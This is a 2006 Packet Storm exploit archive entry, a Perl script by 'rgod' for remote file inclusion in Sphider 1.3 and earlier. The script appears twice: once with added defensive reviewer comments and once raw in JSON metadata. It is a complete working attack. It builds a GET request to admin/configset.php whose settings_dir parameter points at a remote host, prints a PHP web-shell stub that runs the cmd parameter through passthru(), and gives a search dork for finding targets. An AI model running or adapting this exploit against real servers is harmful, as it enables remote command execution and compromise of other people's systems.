ID PACKETSTORM:45432
Type packetstorm
Reporter rgod
Modified 2006-04-14T00:00:00
Description
`#!/usr/bin/perl
use IO::Socket;
# Banner. For a defender the useful line is the second one: the author states
# the issue depends on the PHP settings register_globals = On and
# allow_url_fopen = On both being enabled on the target host.
print "\r\nSphider <= 1.3 arbitrary remote inclusion\r\n",
      "-> works with register_globals = On & allow_url_fopen = On\r\n",
      "by rgod rgod<AT>autistici<DOT>org\r\n",
      "site: http://retrogod.altervista.org\r\n",
      "\r\ndork: \"powered by sphider\"\r\n";
sub main::urlEncode {
    # Percent-encode a string for use in a URL query.
    # Every character matched by \W (for ASCII input: anything other than
    # letters, digits and underscore) is replaced by "%" followed by the
    # two-digit lowercase hex value that unpack("H2") yields for it.
    # Word characters pass through unchanged.
    my $encoded = shift;
    $encoded =~ s{(\W)}{ '%' . unpack('H2', $1) }ge;
    return $encoded;
}
# Main script body: builds one HTTP request against a Sphider install and
# checks the response for a marker string.
#
# Reviewer notes (defensive reading):
#  - The request targets admin/configset.php and supplies a settings_dir query
#    parameter that points at an external URL. The vulnerable PHP file itself
#    is not shown on this page; presumably it builds an include path from
#    settings_dir without initialising it first -- confirm against the Sphider
#    source.
#  - The banner names register_globals = On and allow_url_fopen = On as
#    preconditions, so per the author's own statement turning either off should
#    close this path. Restricting access to the admin/ directory is a further
#    obvious hardening step.
#  - Log indicator: GET requests for admin/configset.php whose query string
#    carries both cmd= and settings_dir=, the latter holding a percent-encoded
#    URL.
#  - The script runs without strict/warnings and every variable is a package
#    global.

# Positional arguments: server, path to the Sphider install, remote location.
# The location is percent-encoded; server and path are used as given.
$serv=$ARGV[0];
$path=$ARGV[1];
$loc=urlEncode($ARGV[2]);
# All remaining arguments are percent-encoded and concatenated, each prefixed
# with "%20" (so the resulting string also starts with "%20").
$cmd=""; for ($i=3; $i<=$#ARGV; $i++) {$cmd.="%20".urlEncode($ARGV[$i]);};
# Argument-count check. Note that it runs only after @ARGV was already read
# above; with too few arguments the script prints usage and exits here.
if (@ARGV < 4)
{
print "\r\nUsage:\r\n";
print "perl sphider_xpl.pl server path location command\r\n\r\n";
print "server - Server where sphider is installed.\r\n";
print "path - Path to sphider (ex: /sphider/ or just /) \r\n";
print "location - a site with the code to include (without ending slash)\r\n";
print "command - a Unix command\r\n\r\n";
print "Example:\r\n";
print "perl sphider_xpl.pl localhost /sphider/ http://192.168.1.3 ls -la\r\n\r\n";
# The rest of the usage text prints the PHP stub the author expects to be
# served from the remote location. As printed, that stub echoes the marker
# 56789 and then passes the cmd request parameter to passthru().
print "note: on http location you need this code in /conf.php/index.html :\r\n\r\n";
print "<?php\r\n";
print "ob_clean();\r\n";
print "if (get_magic_quotes_gpc())\r\n";
print "{\$_GET[\"cmd\"]=stripslashes(\$_GET[\"cmd\"]);}\r\n";
print "ini_set(\"max_execution_time\",0);\r\n";
print "echo 56789;\r\n";
print "passthru(\$_GET[\"cmd\"]);\r\n";
print "die;\r\n";
print "?>\r\n";
exit();
}
# Plain TCP connection to the server on the http port (80) with a 10 second
# timeout; the script dies with a message if the connection fails.
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", Timeout => 10, PeerPort=>"http(80)")
or die "[+] Connecting ... Could not connect to host.\n\n";
# Single HTTP/1.0 GET for <path>admin/configset.php with the encoded command in
# cmd and the encoded remote location in settings_dir. This request line is
# what shows up in the target's access log.
print $sock "GET ".$path."admin/configset.php?cmd=".$cmd."&settings_dir=".$loc." HTTP/1.0\r\n";
print $sock "Host: ".$serv."\r\n";
print $sock "Connection: Close\r\n\r\n";
# Read the whole response (headers and body) into $out until the peer closes.
$out="";
while ($answer = <$sock>) {
$out.=$answer;
}
close($sock);
# Split the response once on the marker 56789. If the marker is present, the
# text after it is printed as the result and the script exits.
@temp= split /56789/,$out,2;
if ($#temp>0) {print "\r\nExploit succeeded...\r\n".$temp[1];exit();}
# Reached only when the marker was not found in the response.
print "\r\nExploit failed...\r\n";
`
{"id": "PACKETSTORM:45432", "type": "packetstorm", "bulletinFamily": "exploit", "title": "sphider_13_xpl_pl.txt", "description": "", "published": "2006-04-14T00:00:00", "modified": "2006-04-14T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/45432/sphider_13_xpl_pl.txt.html", "reporter": "rgod", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:23:26", "viewCount": 1, "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2016-11-03T10:23:26", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:23:26", "rev": 2}, "vulnersScore": -0.3}, "sourceHref": "https://packetstormsecurity.com/files/download/45432/sphider_13_xpl_pl.txt", "sourceData": "`#!/usr/bin/perl \nuse IO::Socket; \n \nprint \"\\r\\nSphider <= 1.3 arbitrary remote inclusion\\r\\n\" ; \nprint \"-> works with register_globals = On & allow_url_fopen = On\\r\\n\"; \nprint \"by rgod rgod<AT>autistici<DOT>org\\r\\n\"; \nprint \"site: http://retrogod.altervista.org\\r\\n\"; \nprint \"\\r\\ndork: \\\"powered by sphider\\\"\\r\\n\"; \n \nsub main::urlEncode { \nmy ($string) = @_; \n$string =~ s/(\\W)/\"%\" . 
unpack(\"H2\", $1)/ge; \n#$string# =~ tr/.//; \nreturn $string; \n} \n \n$serv=$ARGV[0]; \n$path=$ARGV[1]; \n$loc=urlEncode($ARGV[2]); \n$cmd=\"\"; for ($i=3; $i<=$#ARGV; $i++) {$cmd.=\"%20\".urlEncode($ARGV[$i]);}; \n \nif (@ARGV < 4) \n{ \nprint \"\\r\\nUsage:\\r\\n\"; \nprint \"perl sphider_xpl.pl server path location command\\r\\n\\r\\n\"; \nprint \"server - Server where sphider is installed.\\r\\n\"; \nprint \"path - Path to sphider (ex: /sphider/ or just /) \\r\\n\"; \nprint \"location - a site with the code to include (without ending slash)\\r\\n\"; \nprint \"command - a Unix command\\r\\n\\r\\n\"; \nprint \"Example:\\r\\n\"; \nprint \"perl sphider_xpl.pl localhost /sphider/ http://192.168.1.3 ls -la\\r\\n\\r\\n\"; \nprint \"note: on http location you need this code in /conf.php/index.html :\\r\\n\\r\\n\"; \nprint \"<?php\\r\\n\"; \nprint \"ob_clean();\\r\\n\"; \nprint \"if (get_magic_quotes_gpc())\\r\\n\"; \nprint \"{\\$_GET[\\\"cmd\\\"]=stripslashes(\\$_GET[\\\"cmd\\\"]);}\\r\\n\"; \nprint \"ini_set(\\\"max_execution_time\\\",0);\\r\\n\"; \nprint \"echo 56789;\\r\\n\"; \nprint \"passthru(\\$_GET[\\\"cmd\\\"]);\\r\\n\"; \nprint \"die;\\r\\n\"; \nprint \"?>\\r\\n\"; \nexit(); \n} \n$sock = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$serv\", Timeout => 10, PeerPort=>\"http(80)\") \nor die \"[+] Connecting ... Could not connect to host.\\n\\n\"; \nprint $sock \"GET \".$path.\"admin/configset.php?cmd=\".$cmd.\"&settings_dir=\".$loc.\" HTTP/1.0\\r\\n\"; \nprint $sock \"Host: \".$serv.\"\\r\\n\"; \nprint $sock \"Connection: Close\\r\\n\\r\\n\"; \n$out=\"\"; \nwhile ($answer = <$sock>) { \n$out.=$answer; \n} \nclose($sock); \n@temp= split /56789/,$out,2; \nif ($#temp>0) {print \"\\r\\nExploit succeeded...\\r\\n\".$temp[1];exit();} \n#if you are here... \nprint \"\\r\\nExploit failed...\\r\\n\"; \n`\n"}
{}